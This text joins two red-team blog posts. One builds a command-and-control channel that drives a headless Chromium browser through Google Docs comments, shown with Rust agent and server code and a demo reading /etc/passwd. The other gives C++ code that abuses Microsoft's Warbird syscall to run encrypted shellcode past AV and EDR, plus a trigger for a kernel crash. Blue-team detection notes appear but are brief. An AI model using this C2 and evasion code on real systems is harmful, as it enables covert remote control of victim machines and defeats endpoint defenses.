Search

Google DoC2

Search

Google DoC2

November 7, 2024

Google DoC2 - Using Google Docs as a C2 proxy with a headless browser

TL;DR

When building your C2 agent, you may want to avoid outbound traffic directly from your agent to the C2 server for a number of reasons. You may have strict firewall rules that block all non-browsers from accessing the Internet, or you may want to bypass a proxy that only allows access to certain trusted websites. By spawning a headless browser process and using the Chrome DevTools Protocol to interact with a website, you can use the browser’s network stack to send and receive data, effectively bypassing any firewall or web proxy. In this article we show how to use any Chromium-based browser as a C2 agent and Google Docs as a C2 proxy and how to detect this. We provide sample code in Rust and a basic agent and server that can be used to execute shell commands on the agent and receive the output of the commands. Check out the PoC on GitHub.

Introduction

In recent years, the (ab)use of existing services to perform command and control (C2) has become increasingly popular, such as Notion, Slack and so on. However, all these techniques communicate with the service’s API directly from the agent. This may not always be possible or desirable, so in this article we will explore another approach to C2 that uses a headless browser to communicate with the C2 server.

The idea

The Chromium browser, which is the basis for many popular browsers, such as Google Chrome, Microsoft Edge and Brave, provides many useful command-line options that can be used to instrument and interact with the browser programmatically. This is useful for a variety of use cases, such as automated testing, web scraping and, as we will see, C2. So instead of launching the browser with chromium, we can start it with several command-line options that allow us to change its behavior. Note that we are in full control of the browser, so we do not need to use any kind of browser exploit or vulnerability here; we are only using fully intended features of the browser.

Headless mode

The first thing we need to do is start the browser in headless mode, which means that it will not display any windows, but will still run as a normal browser. This is useful for our purposes as we do not want to alert the user that the browser is running.

This is quite easy to do, we just need to add the –headless option to the command line. For example, to start the browser in headless mode, we can use the following command:

$ chromium --headless

Chrome DevTools Protocol (CDP)

To quote the official documentation:

The Chrome DevTools Protocol allows for tools to instrument, inspect, debug and profile Chromium, Chrome and other Blink-based browsers.

You can experiment with what is possible with the protocol by opening this article in a Chromium-based browser and pressing F12 to open the developer tools. Anything you can do in the developer tools can also be done with the CDP.

For example, open the developer tools and navigate to the Console tab. Then type the following command:

window.alert("DevTools Protocol is awesome: " + window.location);

As you can see, the browser displays an alert with the URL of the current page. This proves that we can execute arbitrary JavaScript in the context of any web page.

Using CDP programmatically

By starting the browser with the –remote-debugging-port option, the browser will start a WebSocket server on the specified port (or choose a random port if 0 is specified). We can then connect to this WebSocket server and send commands to the browser using the CDP:

$ chromium --headless --remote-debugging-port=0
[...]
DevTools listening on ws://127.0.0.1:32785/devtools/browser/ab4c2a5e-182c-4163-9d98-a0e327635395
[...]

We can connect to the browser and send commands using a WebSocket client and implementing the CDP manually. However, this approach is cumbersome and error prone. To avoid this, we will use a library that handles these tasks for us.

Typically, Node.js or Python are used to interact with the browser since there are popular libraries for both languages that implement the CDP, such as puppeteer for Node.js and pyppeteer for Python. However, in the context of C2, we may prefer to use a compiled language instead of an interpreted one. Therefore, we will use Rust along with the chromiumoxide library, which offers a high-level API for interacting with the browser through the CDP. This enables us to send commands to the browser and receive results with ease.

Using Google Docs as a C2 proxy

To illustrate the concept, we will use Google Docs as a C2 proxy. Current techniques, such as OffensiveNotion, require the agent to contain an API key that is used to access the service. However, because we have the ability to interact with the browser instead of relying on an API, we can use any website as a C2 proxy, as long as we can interact with it using the CDP. Choosing Google Docs as a C2 proxy has the added benefit that it is unlikely to be blocked by any firewall or proxy, as it is a trusted website and requires no authentication when a document is shared using the “Anyone with the link can edit” permission.

Implementation

Interacting with Google Docs using the CDP

First, we need to develop the required abstractions so that we can programmatically interact with Google Docs using the CDP.

For the test setup, we first create a new Google Docs document and share it with the “Anyone with the link can edit” permission as shown in Figure 1

Frederik Reiter

Consultant

Category
Date
Navigation
Figure 1: Sharing a Google Doc with the “Anyone with the link can edit” permission

This will generate a link like below, which we will refer to as the “Docs URL” from now on. Let’s save it to an environment variable for later use:

$ export DOCS_URL="https://docs.google.com/document/d/XXXXXXXX/edit?usp=sharing"

Now, we need to identify the elements on the page that we can interact with. To achieve this, we can open the developer tools and inspect the page. By using the “Element selector” tool, we can select the elements we want to interact with. In this case, we want to interact with the content area where the text content of the document is displayed, enabling us to read and write data to the document. Using the “Element selector” and clicking on the content area as show in Figure 2, we can see that, unfortunately for us, the body of the document seems to be some kind of “canvas” element, which is awkward to interact with using the CDP because it only contains image data. If we wanted to read the text, we’d have to first read the image from the webpage, then use optical character recognition to extract the text.

<div class="kix-page-paginated canvas-first-page" style="position: absolute; top: 5px; left: 5px; z-index: 0; width: 794.4px; height: 1123.2px;"><canvas class="kix-canvas-tile-content" width="993" height="1404" style="z-index: 0; width: 794.4px; height: 1123.2px;" dir="ltr"></canvas></div>
Figure 2: Inspecting the Google Docs page

To work around this issue, we explored other methods of modifying the state of the document and eventually landed on the idea of using the Comments feature of Google Docs. As comments are not part of the canvas element, we can interact with them using the CDP more easily. The only requirement is that the document is not completely empty because the comments are always attached to a specific position in the document. So, if you’re following along, make sure to type some text in the document so that comments can be added.

Adding a comment to the document

So, as a first step, we want to write code that adds a new comment to the document. By clicking on “Insert” (div#docs-insert-menu), followed by the “m” key, we can add a comment to the document. By typing in the comment field (div.docos-input-contenteditable) and clicking on the “Comment” button (div.docos-input-buttons-post), we will add a comment to the document. This comment can then be read by the C2 server and used to get information from the agent. The reverse is also possible: the C2 server can add a comment to the document, which the agent can then read and act upon.

We can easily implement the process outlined above using the CDP.

First, we click on the “Insert” menu and press the “m” key:

page.find_element("div#docs-insert-menu").await?
   .click().await?
   .press_key("m").await?;

Then, we find the comment field and insert the text we want to add to the document:

page.find_element("div.docos-input-contenteditable").await?
   .click().await?
    .type_str("Hello, world!").await?
   .click().await?;

Finally, we click on the “Comment” button to add the comment to the document:

page.find_element("div.docos-input-buttons-post").await?
   .click().await?;

Now, running the code will add a comment to the document. The full code for adding a comment is implemented in src/lib.rs in the GitHub repository. An example of how to use the library to add a comment to the document can be found in examples/add_comment.rs and can be run using the following command:

$ cargo run --example add_comment
   Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s

As shown in figure 3, the comment is successfully added to the document.

Figure 3: A comment added to the document by the agent

Reading comments from the document

Next, we want to read the comments from the document. We need this functionality to receive commands from the C2 server and on the server side to receive the output of the commands executed by the agent.

Reading all comments from the document is quite straightforward because all comments are stored in a div with the class docos-replyview-body. Using the CDP, we can find all elements with this class and read the text of the comments:

let mut comments = Vec::new();
for comment in page
   .find_elements("div.docos-replyview-body")
   .await?
   .into_iter()
{
   if let Some(comment) = comment.inner_text().await? {
       comments.push(comment);
   }
}

This is also implemented in src/lib.rs. An example of how to use the library to read all comments from the document can be found in examples/read_comments.rs and can be run using the following command:

$ cargo run --example read_comments
   Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
[examples/read_comments.rs:11:5] c2.read_all_comments().await? = [
   "Hello, World!",
]

We can see that the comment “Hello, World!” that we added earlier is returned by the function.

Encoding data in comments

Now that we have the necessary abstractions to send and receive data “through” the document, we need to specify an encoding that the agent and the server will use to encode and decode the data.

For this PoC, we will be executing shell commands on the agent and returning the output to the server, so not much encoding is required. We only need a way to indicate if a comment is a command or the output of a command. In production, you would probably want to use a more sophisticated encoding and layer some kind of public key cryptography on top of it to ensure that only the C2 server can issue commands (with the corresponding private key) and that only the server can read the output of the commands (encrypted with the public key).

All messages are hex encoded. The first byte of the message indicates if the message is a command (0x01) or the output of a command (0x02). The next 12 bytes of the message are the message ID, which is used to match the output of a command to the command itself. The 0x01 (command) message is then followed by the command, and the 0x02 (output) message is followed by the output of the command with the corresponding message ID. We also add a third message type, 0x03, which is used to indicate that the agent should exit.

All in all, the encoding is specified by these Rust types with some convenience functions to encode and decode the messages implemented in src/shell.rs:

#[repr(u8)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub enum MessageType {
   Command = 0x01,
   Output = 0x02,
   Exit = 0x03,
}
#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub struct Message {
   pub message_type: MessageType,
   pub message_id: [u8; 12],
   pub message: String,
}

Putting it all together

We now have the required abstractions to interact with Google Docs using the CDP and have defined an encoding for the messages. Let’s put it all together to create an agent and server pair that can be used to execute shell commands on the agent and receive the output of the commands.

The agent starts a headless browser and then enters a loop where it reads comments from the document, decodes them, executes the command, and then writes the output of the command back to the document.

The server asks the operator for a command, encodes it, and then writes it to the document. It will then wait for the output of the command, decode it, and print it to the operator. It also can send the special 0x03 message to the agent to make it exit. We also added a few utility functions, such as clearing all comments from the document and displaying all already present comments.

The full code for the agent and server can be found in the examples directory of the repository, in shell_agent.rs and shell_server.rs respectively.

To run the example:

  1. Clone the repository (git clone https://github.com/cirosec/google-doc2).
  2. Create a new Google Docs document and share it with the “Anyone with the link can edit” permission.
  3. Type some text in the document so that it is not empty. If you want, you can keep the document open in your normal browser to see the comments being added.
  4. Set the “DOCS_URL” environment variable to the URL of the document and run the agent:
    $ export DOCS_URL="https://docs.google.com/document/d/XXXXX/edit?usp=sharing" 
    $ cargo run --example shell_agent    
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
    Running `target/debug/examples/shell_agent
  5. Run the server in another terminal and execute some commands, in this case hostname and cat /etc/passwd | head:
    $ export DOCS_URL="https://docs.google.com/document/d/XXXXX/edit?usp=sharing"
    $ cargo run --example shell_server
       Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
    Successfully opened Google Docs!
    Choose an action: Submit a new command
    Enter a command: hostname
    -> victim
    Choose an action: Submit a new command
    Enter a command: cat /etc/passwd | head
    -> root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    Choose an action: Exit

    As you can see, the server is able to send commands to the agent and receive the output of the commands. The agent is able to execute the commands and send the output back to the server.

Blue Team Perspective

All C2 traffic generated by this technique is sent out by an unmodified browser executable. In the case of Microsoft Edge, the executable is even signed by Microsoft! This makes it very difficult for blue teamers to detect that something is up and even if someone notices the channel, all traffic is sent “encoded” through the Google Docs API, which is not very straightforward to understand. As an example, here’s the POST request apparently responsible for adding a comment to the document:

POST /document/d/XXXXXXXX/docos/p/sync?id=XXXXXXXX&reqid=3&sid=XXXXXXXX&vc=1&c=1&w=1&flr=0&smv=52&smb=XXX
&token=XXXXX&includes_info_params=true&cros_files=false HTTP/2
Host: docs.google.com
[...]
p=%5B%5B%5B%22XXXXXXXX%22,%5Bnull,null,%5B%22text/html%22,%22
test%20comment%22%5D,%5B%22text/plain%22,%22test%20comment%22%5D,%5B%22
Anonym%22,null,%22//ssl.gstatic.com/docs/common/blue_silhouette96-0.png%22,%22ANONYMOUS_105250506097979753968%22,1%5D,1712922484034,1712922484034,
null,%5B%22text/plain%22,%22Hello,%20world!aa%22%5D,null,%22XXXXXXXX%22,1%5D,1712922484034,
null,null,null,null,%22kix.290cok7o9jiy%22,1%5D%5D,1712921888390%5D

The comment text is in there, but from a blue team perspective it seems very difficult to figure out what is going on based on that traffic alone, especially if the comment text is encrypted and obfuscated before being added to the document.

Additionally, this technique may be used with any other service that provides similar functionality as Google Docs. To detect this behavior more generally, we can instead focus on the way the Chromium instance is launched by the agent. Of course, this differs from normal execution of Chromium because the executable is started at least with the two flags –remote-debugging-port=0 and –headless we discussed earlier. In actuality, the library uses a lot more arguments, but only these two are strictly necessary. Therefore, if you’d like to build alerting for this type of C2 channel, we’d recommend setting up alerts on processes of Chromium-based browsers (so Chromium, Chrome, Edge, Brave and the like) with any of these two flags present. During normal operation of Chromium, we haven’t seen any uses of these flags, but they are not technically malicious themselves and may be used by developers when running automated tests on web applications, so you might need to configure allowlists for developer machines as necessary.

Conclusion

In this article, we demonstrated that it is to use a headless browser, normally already present on the target system, as a proxy for C2 communication. For the PoC we used Google Docs, but hopefully it is clear that any website can be used as a C2 proxy, as long as it can be used to transmit and receive data using the CDP. All the code for the PoC can be found on GitHub.

In practice, this technique should be built upon to add more sophisticated encoding, asymmetric encryption and customize the website used to fit the scenario of the red team engagement. For example, the website could be a company-internal website, which would make it even less likely to be blocked by any firewall or proxy.

Further blog articles

Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Abusing Microsoft Warbird for Shellcode Execution

Search

Abusing Microsoft Warbird for Shellcode Execution

November 7, 2024

Abusing Microsoft Warbird for Shellcode Execution

TL;DR

In this blog post, we’ll be covering Microsoft Warbird and how we can abuse it to sneakily load shellcode without being detected by AV or EDR solutions. We’ll show how we can encrypt our shellcode and let the Windows kernel decrypt and load it for us using the Warbird API. Using this technique, you can hide your shellcode from syscall-intercepting EDR solutions allowing you to allocate executable memory, decrypt the shellcode, and jump to the decrypted shellcode all in one syscall, without ever having decrypted shellcode at any writeable memory region at any point during the execution of your process. Check out the PoC on GitHub.

Basics

Introduction

Microsoft Warbird is Microsoft’s undocumented internal code protection and obfuscation framework. It is used for DRM to protect sensitive code from reverse engineering and tampering. Warbird supports multiple obfuscation techniques like VM-based obfuscation, constant obfuscation, section encryption or runtime code protection. According to This is Security, Microsoft Warbird was introduced in Windows 8/2012. One application is, e.g., the Microsoft Software Protection Platform Service (sppsvc.exe), which handles the Windows activation algorithms.

The Warbird framework is intended to be used exclusively by Microsoft services. The functionality provided by Warbird is not intended to be used by third-party developers, and Microsoft actively tries to prevent this. Before we show you how to abuse it anyway, let’s first describe how Microsoft services would normally use Warbird.

Runtime Code Protection

The feature of Warbird that we are interested in for loading shellcode is the runtime decryption of code.

The runtime decryption feature of Warbird allows for the execution of encrypted code. The code is encrypted using a custom Feistel cipher developed specifically for Warbird. How exactly a Feistel cipher works is not important for us right now, just know that it is a symmetric encryption algorithm that operates on blocks of data.

When Warbird was first introduced, the decryption and execution of the basic blocks were simply performed by the process in user mode. This meant that when the executing process wanted to execute encrypted code, it would use the Feistel cipher to decrypt it, allocate new executable memory, place the decrypted code in this memory, and then jump to the beginning of the decrypted code.

To mitigate some unrelated attack vectors (think ROP chain and the like), at some point Microsoft decided that some user mode processes are forbidden from allocating new executable memory, by introducing Arbitrary Code Guard (ACG). This prevents memory corruption exploits from using the Windows API to allocate new executable memory and placing their shellcode there. ACG also prevented Warbird from working in these processes, so the decryption and allocation of the encrypted code was moved to the kernel level. This means that the Windows kernel is responsible for allocating memory in the process’s heap and marking it as executable, so that Warbird can be used even when the executing process is not allowed to allocate executable memory , for example by specially protected browser processes of the legacy Microsoft Edge. To reiterate, Microsoft decided that it would be safer to offer a kernel-level API for the decryption and allocation of code, rather than allowing the process itself to decrypt its encrypted code, which should be enough to raise some eyebrows.

The flow of the runtime decryption routine is as follows:

  1. The process wants to execute encrypted code.
  2. The process locates the corresponding encrypted code in its own memory and passes it to the kernel.
  3. The kernel decrypts the code, allocates a new executable memory region in the process’s heap, copies the decrypted code into this new memory region, and marks it as executable.
  4. The kernel passes execution control back to the process at the beginning of the decrypted code.
Figure 1: Runtime decryption of encrypted code using Warbird
Jan-Luca Gruber and Frederik Reiter

Consultants

Category
Date
Navigation

Feistel Cipher

The custom Feistel cipher used by Warbird is a custom implementation and not documented at all by Microsoft.

Thankfully, a blog post by DownWithUp already documents how the Warbird API can be used to encrypt arbitrary data using a clever combination of syscalls to make the kernel perform the encryption for you. That way, we can use the kernel as a “black box” implementation of the Feistel cipher, without having to know the details of the cipher itself.

We experimented around with using their technique to encrypt data for the Warbird decryption routine but were unable to use the encrypted data with the runtime decryption. Lucky for us, a source code leak of the Warbird framework from 2017 contains a working implementation of the Feistel cipher used by Warbird, which we can use to encrypt our shellcode for the runtime decryption routine. This source code has been circulating on the internet for a while and has recently become available on GitHub.

Warbird Syscall

To request a decryption and allocation from the kernel, the process must call the NtQuerySystemInformation syscall with the SystemInformationClass set to SystemCodeFlowTransition (0xB9). Although this is not officially documented by Microsoft, thanks to the leak of Windows source code, we have access to a lot of information about this syscall. The syscall takes a pointer to a struct containing a WbOperationType that specifies the operation to be performed, and a pointer to a struct containing additional data for the operation. According to the leaked source code, the WbOperationType enum contains the following values:

typedef enum {
   WbOperationNone,
   WbOperationDecryptEncryptionSegment,
   WbOperationReEncryptEncryptionSegment,
   WbOperationHeapExecuteCall,
   WbOperationHeapExecuteReturn,
   WbOperationHeapExecuteUnconditionalBranch,
   WbOperationHeapExecuteConditionalBranch,
   WbOperationProcessEnd,
   WbOperationProcessStartup,
} WbOperationType;

We will focus on the WbOperationHeapExecuteCall operation, which can be used to perform the described decryption and allocation routine in the kernel. The struct that is passed to the syscall for this operation is also part of the leaked source code but appears to have changed slightly since the leak. Combining the leak with the information from Alex Ionescu’s talk about Warbird at Ekoparty 2017, we can assume that the struct looks something like this:

typedef struct _HEAP_EXECUTE_CALL_ARGUMENT {
   uint8_t ucHash[0x20];
   uint32_t ulStructSize;
   uint32_t ulZero;
   uint32_t ulParametersRva;
   uint32_t ulCheckStackSize;
   uint32_t ulChecksum : CHECKSUM_BIT_COUNT;
   uint32_t ulWrapperChecksum : CHECKSUM_BIT_COUNT;
   uint32_t ulRva : RVA_BIT_COUNT;
   uint32_t ulSize : FUNCTION_SIZE_BIT_COUNT;
   uint32_t ulWrapperRva : RVA_BIT_COUNT;
   uint32_t ulWrapperSize : FUNCTION_SIZE_BIT_COUNT;
   uint64_t ullKey;
   WarbirdRuntime::FEISTEL64_ROUND_DATA RoundData[NUMBER_FEISTEL64_ROUNDS];
} HEAP_EXECUTE_CALL_ARGUMENT, * PHEAP_EXECUTE_CALL_ARGUMENT;

We’ll only highlight the most important fields for our purposes:

  • ucHash: A 32-byte SHA-256 hash of the following fields in the struct. If this hash does not match the hash of the rest of the struct, the kernel will refuse to perform the operation. This is used to prevent tampering with the struct, as the hash is calculated over the fields that are relevant for the decryption and allocation. Note that this hash does not provide authentication, only integrity, so an attacker could still modify the struct, given that they can calculate a new hash for the modified struct.
  • ulStructSize: The size of the struct in bytes.
  • ulRva: The offset of the encrypted code relative to the start of the struct in memory[1].
  • ulSize: The size of the encrypted code in bytes.
  • ullKey: The 8-byte key used for the Feistel cipher.
  • RoundData: Configuration data for each round of the Feistel cipher.

All other fields are not relevant for our purposes and should be set to zero.

The complete struct passed to the syscall then simply contains the WbOperationType, the HEAP_EXECUTE_CALL_ARGUMENT struct, and a pointer to a NTSTATUS variable that will receive the result of the operation:

typedef struct _WB_OPERATION {
   WarbirdRuntime::WbOperationType OperationType;
   union {
       // ...
       PHEAP_EXECUTE_CALL_ARGUMENT pHeapExecuteCallArgument;
       // ...
   };
   NTSTATUS* Result;
} WB_OPERATION, * PWB_OPERATION;

Abusing Warbird

As previously stated, only Microsoft services are intended to invoke Warbird syscalls. To enforce this, the Windows kernel requires the HEAP_EXECUTE_CALL_ARGUMENT struct to be in a memory region that is marked with a ImageSigningLevel of (12), which indicates that the memory region “belongs to” a Windows component. As already noted by DownWithUp, this check can quite easily be bypassed by first loading a Microsoft-signed DLL into your own process, and then using VirtualProtect(RW) and memcpy to change the contents of the DLL’s .text section to contain the HEAP_EXECUTE_CALL_ARGUMENT struct. For our convenience, we place the encrypted shellcode directly after the struct in the .text section and set the ulRva field simply to the size of the struct. This way, the kernel will decrypt the shellcode directly after the struct in the same memory region.

After the data has been placed, the .text section must be marked as executable using VirtualProtect(RX) and can then be used to invoke the Warbird syscall.

Preparation

We first need to encrypt the shellcode we want to execute using the Feistel cipher. We can use the implementation from the leaked Warbird source code to do this:

BYTE shellcode[] = { ...};
BYTE encrypted[sizeof(shellcode)];
auto cipher = WarbirdCrypto::CCipherFeistel64::CreateRandom();
WarbirdCrypto::CChecksum checksum;
WarbirdCrypto::CKey key { .u64 = 0xdeadbeefcafeaffe };
cipher->Encrypt((BYTE*) shellcode, (BYTE*) encrypted, sizeof(shellcode), key, 0xf0, &checksum);

The WarbirdCrypto namespace can be taken directly from the leaked source code and #included in your project. The headers from the leaked source code are not functional on their own, and require some additional includes to work, as well as a workaround to use them outside of the WarbirdRuntime namespace:

#include <Windows.h>
#include <set>
#include <sstream>
#define WARBIRD_CRYPTO_ENABLE_CREATE_RANDOM
#include "../warbird-example/WarbirdCUtil.inl"
#include "../warbird-example/WarbirdRandom.inl"
#define Random WarbirdRuntime::g_Rand.Random
#include "../warbird-example/WarbirdCiphers.inl"
#undef Random

To load the encrypted shellcode, we need to create the HEAP_EXECUTE_CALL_ARGUMENT struct:

HEAP_EXECUTE_CALL_ARGUMENT params{
.ucHash = { }, // We'll leave this empty for now
.ulStructSize = sizeof(HEAP_EXECUTE_CALL_ARGUMENT),
.ulZero = 0,
.ulParametersRva = 0,
.ulCheckStackSize = 0,
.ulChecksum = 0,
.ulWrapperChecksum = 0,
.ulRva = sizeof(HEAP_EXECUTE_CALL_ARGUMENT), // shellcode starts right after the struct
.ulSize = static_cast<uint32_t>(sizeof(shellcode)),
.ulWrapperRva = 0,
.ulWrapperSize = 0,
.ullKey = key.u64,
.RoundData = { }
};
// Copy over the round configuration
memcpy(params.RoundData, cipher->m_Rounds, sizeof(cipher->m_Rounds));
// Lastly, calculate the hash of the struct
picosha2::hash256(
      reinterpret_cast<uint8_t*>(&params.ulStructSize), // Start after the hash field
      reinterpret_cast<uint8_t*>(&params + 1), // Up to the end of the struct
      reinterpret_cast<uint8_t*>(&params.ucHash), // Store the hash here
      reinterpret_cast<uint8_t*>(&params.ulStructSize) // End of the hash field
);

The picosha2 namespace is a simple SHA-256 implementation that can be found here.

Execution

After the data has been prepared, we can now load the Microsoft-signed DLL into our process, change the contents of the .text section to contain the HEAP_EXECUTE_CALL_ARGUMENT struct and encrypted shellcode, mark the section as executable and finally call the Warbird API:

HMODULE clipc = LoadLibraryA("clipc.dll"); // Microsoft-signed DLL
if (clipc == NULL) return 1;
DWORD old;
VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_READWRITE, &old);
memcpy(clipc, &params, sizeof(params));
memcpy((uint8_t*)clipc + sizeof(params), &encrypted, sizeof(encrypted));
VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_EXECUTE_READ, &old);
NTSTATUS result = 0;
WB_OPERATION request{
      .OperationType = WarbirdRuntime::WbOperationHeapExecuteCall,
      .pHeapExecuteCallArgument = (PHEAP_EXECUTE_CALL_ARGUMENT)clipc,
      .Result = &result
};
NTSTATUS status = NtQuerySystemInformation(SystemCodeFlowTransition, &request, sizeof(request), nullptr);

And that’s it! The kernel will now decrypt the shellcode, place it in the process’s memory and redirect execution to the beginning of the decrypted shellcode. Notice how we didn’t ever have to invoke any syscall with the decrypted shellcode as an argument? This is usually the case when loading shellcode, for example when calling VirtualProtect on a memory region to set it executable, the region usually already contains the decrypted shellcode and is used by EDR products as a point of detection by scanning the memory regions passed to the kernel for known signatures. This isn’t possible in our case: An EDR spying on syscalls and scanning associated memory regions will only “see” encrypted shellcode, and thus come up empty handed. The full code for the above example can found in our GitHub repository.

Limitations

We’ve now seen how we can load encrypted shellcode using the Warbird API, but there are some limitations to keep in mind:

  1. We still need to call VirtualProtect(RX) to change the permissions of the .text This could be detected as suspicious behaviour by some EDR products, but we haven’t seen any detections solely based on this pattern because the contents that are placed in the .text section are fully encrypted and thus not detectable as malicious shellcode.
  2. The functionality we’re abusing here was never intended to be used for entire shellcode payloads but rather for small, sensitive code blocks. The Warbird API limits the size of the encrypted code to 0x10000 bytes, so we cannot load any shellcode larger than 64 KiB. There might be ways to work around this limitation by dynamically loading and re-linking the shellcode, but this is left as an exercise for the reader 😉

We’ve not put much research effort into the other available operations, especially those not previously documented by DownWithUp, so these are probably a good starting point for further research.

Blue Team Perspective

This technique is very effective at bypassing existing shellcode loading detections. Typically, to simplify a bit, an anti-malware product might scan all memory addresses referenced by an application when calling a Windows API that could cause execution to start at that address, such as NtCreateThreadEx, or operations that cause memory to become executable, such as NtProtectVirtualMemory. The anti-malware product may then use a signature database or use pattern-based detection to determine whether the memory that is about to be executed is malicious or not. In some cases, an anti-malware product might simply block all operations that that allocate memory, mark the allocated memory as being executable and pass executed to the newly allocated memory, regardless of the actual memory content, especially if the executable performing these operations is not trustworthy by some metric. The technique presented here bypasses this scanning because the memory that we’re “supplying” as pointer arguments to the Windows API only contains encrypted shellcode. The address of the decrypted shellcode, which is allocated by the kernel itself, is not even passed back to userspace. Because the shellcode is decrypted and executed “in one go” by the kernel itself, any hooks on Windows API calls placed by an anti-malware product are bypassed.

To nonetheless detect this behaviour, an anti-malware product may opt to decrypt any shellcode passed to NtQuerySystemInformation itself and check the decrypted shellcode for known signatures, block any use of Warbird APIs in non-Microsoft processes, or may rely on behaviour detection and periodic memory scanning to detect the known malicious shellcode, once it has been decrypted by the kernel.

Conclusion

This is a very powerful technique, as it allows us to bypass most AV and EDR scrutiny. If an EDR product intercepts the syscall, it will only see the encrypted shellcode, and not the decrypted shellcode that is executed, so any signatures or heuristics that the EDR product uses to detect malicious shellcode will not trigger. We’ve successfully used this technique in practice to bypass multiple leading EDR solutions.

Bonus: BSOD

While researching and experimenting with Warbird, we encountered a bug in the Warbird API that can be used to trigger a blue screen of death. When allocating memory in the process’s heap, the kernel adds some randomness to the base address of the allocated memory, presumably as a kind of “Pseudo Adress Space Layout Randomization (ASLR)”. An implementation error in this allocation function causes a divide by zero in the kernel when the required size is between 0xffc1 and 0xffff:

uint32_t slot_count = (required_size + 63) / 64;
uint32_t rand_offset = ExGenRandom(1) % (1024 - slot_count);

Working backwards, when slot_count == 1024, the kernel will attempt a modulo operation with a divisor of zero, which will cause a division by zero in the kernel. Because slot_count is simply required_size divided by 64 (rounded up), the required size for this bug to trigger is 0xffc1 <= required_size <= 0xffff.

The value of required_size here is simply ulSize + 16, so any values for ulSize in the range from 0xffb1 to 0xfff0 will cause the division by zero. We have included a PoC for this bug in our GitHub repository.

Further Reading

[1] This is actually a bit more involved, as it is relative to the start of the current Warbird block. If we set ulParametersRva to zero though, the offset will be relative to the start of the struct. Refer to the talk by Alex Ionescu for more information.

Further blog articles

Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.
Search
Search